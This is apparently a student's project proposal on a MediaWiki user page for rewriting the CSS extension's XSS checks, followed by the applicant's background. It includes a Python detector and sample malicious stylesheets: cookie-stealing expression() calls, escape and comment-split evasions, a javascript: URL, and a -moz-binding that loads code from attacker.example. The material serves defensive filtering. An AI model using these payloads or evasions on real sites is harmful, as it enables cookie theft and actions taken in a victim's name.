User:Sakshi b/Proposal

Personal Details

 * Name: Sakshi Bansal
 * Email: sakshi.april5@gmail.com
 * Other contact methods: gtalk, IRC, Skype
 * Location: Kerala, India
 * Timezone: GMT+5:30

XSS attack in CSS
Cross-site scripting (XSS) is one of the most common attacks against dynamic web pages. A dynamic web page is one whose output depends on parameters provided by the client, for example through form fields or URL parameters. XSS is performed by injecting malicious script into such a page, so that when a client (the victim) loads the page the script runs in the victim's browser, with the same access to the site as the victim has. XSS can be used to gather private information, steal cookies, or perform actions in the victim's name, such as deleting records from the database.

As a little-known feature, some CSS implementations permit JavaScript code to be embedded in stylesheets. There are at least three ways to achieve this:
 * The expression(...) function (a proprietary Internet Explorer feature), which evaluates arbitrary JavaScript and uses the result as the value of a CSS property.
 * A url('javascript:...') value on properties that accept URLs.
 * Browser-specific properties that load code, such as Firefox's -moz-binding (XBL) and Internet Explorer's behavior (HTC).

Current Scenario
The CSS extension provides a mechanism for applying CSS to individual pages, which also means that user-supplied CSS is a likely vector for injecting malicious code. The extension does check the CSS for XSS, but the current checks are very crude, so a lot of valid CSS is rejected. Because CSS allows escape sequences (expr\65ssion) and, in lenient browsers, comments inside identifiers (expr/**/ession), any check also has to run on a decoded, comment-free form of the stylesheet rather than on the raw text, or it will miss malicious code as well. The aim of this project is to implement a better CSS parser that rejects all malicious code and accepts all legal code, so that the new parser provides both security and accuracy.
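To make the difference between a crude check and a normalising check concrete, the following is an added example in Python; it is not MediaWiki code, not the CSS extension's code, and not code from this proposal. It decodes CSS escapes and strips comments before testing for the three embedding techniques listed above (the browser-specific constructs it knows are Firefox's -moz-binding and Internet Explorer's behavior), and compares the result with a case-sensitive substring test. The function names (normalize_css, find_dangerous_css, crude_check_rejects) are my own, and every sample stylesheet is constructed for the illustration.

```python
import re

# Added illustration: a normalising CSS checker. It is not MediaWiki's
# Sanitizer or the CSS extension's code; the function names are made up here
# and every sample stylesheet below is constructed for the demonstration.

# CSS escape: a backslash followed by 1-6 hex digits and an optional single
# whitespace terminator, or a backslash followed by any other character.
_ESCAPE_RE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))", re.DOTALL)
# A comment runs from the leftmost "/*" to the first "*/" after it, exactly as
# a CSS tokenizer consumes it; an unterminated comment swallows the rest.
_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
_OPEN_COMMENT_RE = re.compile(r"/\*.*\Z", re.DOTALL)
_CONTROL_RE = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")
_URL_RE = re.compile(r"url\s*\(\s*(['\"]?)(.*?)\1\s*\)", re.DOTALL)

# Constructs tested against the normalised (decoded, comment-free, lower-cased)
# text: IE's expression(), Firefox's -moz-binding (XBL) and IE's behavior (HTC).
_DANGEROUS = [
    ("ie-expression", re.compile(r"\bexpression\s*\(")),
    ("moz-binding", re.compile(r"-moz-binding\s*:")),
    ("ie-behavior", re.compile(r"\bbehavior\s*:")),
]
# URL schemes that execute script when used in url(...).
_SCRIPT_SCHEMES = ("javascript:", "vbscript:")


def _decode_escape(match):
    if match.group(1) is not None:
        code_point = int(match.group(1), 16)
        if code_point == 0 or code_point > 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
            return "\ufffd"
        return chr(code_point)
    return match.group(2)


def normalize_css(css):
    """Return the stylesheet in the form the checks below run against."""
    text = _ESCAPE_RE.sub(_decode_escape, css)   # expr\65ssion -> expression
    text = _COMMENT_RE.sub("", text)             # expr/**/ession -> expression
    text = _OPEN_COMMENT_RE.sub("", text)
    text = _CONTROL_RE.sub("", text)
    return re.sub(r"\s+", " ", text).lower()     # EXPRESSION( -> expression(


def find_dangerous_css(css):
    """Names of the dangerous constructs found in css; an empty list means clean."""
    norm = normalize_css(css)
    hits = [name for name, pattern in _DANGEROUS if pattern.search(norm)]
    for match in _URL_RE.finditer(norm):
        # Browsers ignore whitespace inside a scheme, so drop it before comparing.
        target = re.sub(r"\s+", "", match.group(2))
        if target.startswith(_SCRIPT_SCHEMES):
            hits.append("script-url")
            break
    return hits


def crude_check_rejects(css):
    """A case-sensitive substring test of the kind the proposal calls crude."""
    return "expression" in css or "javascript:" in css


# Constructed samples: the first group should be rejected, the second accepted.
MALICIOUS = {
    "plain expression": "div { width: expression(alert(document.cookie)) }",
    "hex escape": "div { width: expr\\65ssion(alert(1)) }",
    "comment split": "div { width: expr/**/ession(alert(1)) }",
    "upper case": "div { width: EXPRESSION(alert(1)) }",
    "escaped javascript url": "div { background: url(jav\\61 script:alert(1)) }",
    "xbl binding": "div { -moz-binding: url(http://attacker.example/x.xml#b) }",
}
BENIGN = {
    "plain rule": "a { color: red }",
    "word in comment": "/* expression of house style */ a { color: red }",
    "word in class name": ".expression-box { color: red }",
}

if __name__ == "__main__":
    for label, css in MALICIOUS.items():
        print(f"reject  {label:24} crude={crude_check_rejects(css)!s:5} parsed={find_dangerous_css(css)}")
    for label, css in BENIGN.items():
        print(f"accept  {label:24} crude={crude_check_rejects(css)!s:5} parsed={find_dangerous_css(css)}")
```

Running the script shows the two failure modes side by side: the substring test misses the escaped, comment-split, upper-case and escaped-URL variants (false negatives) while rejecting a comment and a class name that merely contain the word "expression" (false positives); the normalising check catches all of the malicious samples and accepts all of the benign ones. Comments are stripped in a single left-to-right pass on purpose, since that is how a CSS tokenizer consumes them; repeatedly stripping until nothing changes would remove text that a browser still sees.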

About you
I am a fourth-year student currently pursuing my Bachelor's in Computer Science Engineering at Amrita Vishwa Vidyapeetham, India. I will graduate in May 2014. I am among the top 2% of my class.

My area of interest mainly lies in web development and web security. I am proficient in website development languages like HTML, CSS, JavaScript, PHP and MySQL. I have conducted sessions on JavaScript and PHP for FOSS club members at my university. I am part of the university team, bi0s. My team participates in various national and international Capture The Flag (CTF) ethical hacking contests. We have been consistently performing well and secured 1st position in India and 72nd position out of more than 639 teams that participated in CSAW CTF 2012. In the team I am in charge of web services. Participating in these ethical hacking contests has improved my learning curve.

I have fixed bugs in Thunderbird in a short time span, which shows that I am a fast learner. I have greatly improved my communication skills by constantly being on IRC and asking questions about the project idea and various bugs.

Work/Internship Experience
I have implemented an Access Control List (ACL) library using Java servlets. As a personal project, and out of interest in web development, I have developed an On-line Banking project; here I implemented both the front-end, using HTML, JavaScript and PHP, and the back-end, using MySQL. I have also developed a small 'Music Academy Registration' application, with the front-end implemented in Java and the back-end in PostgreSQL.

Participation
I am a punctual person and always complete my work on time. I would follow the timeline that I have developed so that I always complete my work on time. I would also report the completion of my work to my mentor and keep an update on my user page so that the developers know about the progress of the project. For any help required I would first search, then ask on IRC and discuss with my mentor.

Past open source experience
MediaWiki:

Currently working on the following bugs:

Bug 50808 - There is no need for a "details" link if the user is already in the "details" page

Bug 55980 - In Special:Watchlist, "Show/Hide logged-in users" should be "Show/Hide registered users"

I have fixed the following bugs in Thunderbird: 

Bug 581470 - Ctrl+P and Ctrl+W not working from Print Preview window

Bug 708550 - Cannot copy version string from "About Thunderbird" dialogue window

Bug 507103 - Composition's "Save" button remembers last "Save as" choice (draft, template, or file), but no indication of current choice in drop down menu (menu items should be type="radio")

Bug 325777 - "Search messages" window has mislabeled button - "File" should be "Move"

Bug 465351 - Wrong message and reason reported with untrusted CA roots when signing email

Reported bugs:

Bug 866498 - Radio group for Main Menu Bar->View->Feed Message Body As-> and Radio group for App Menu-> View->Feed message Body As-> are not in sync with each other.

Why FOSS
According to the principles of security, security through obscurity is not a good technique, since there can be a lot of bugs and security flaws. However, if the source code is publicly available (FOSS), a large number of people can analyse the code and find bugs and security flaws. This directly improves the quality of the products. Also, since people can download the source code, they can modify it to suit their needs. Again, this implies that the products developed under FOSS are more user-friendly and user-centric. Open source contribution gives users an opportunity to help develop their favourite products. The contributions range from simple bug fixes to adding new modules. This also means that better versions of the products become available faster than otherwise.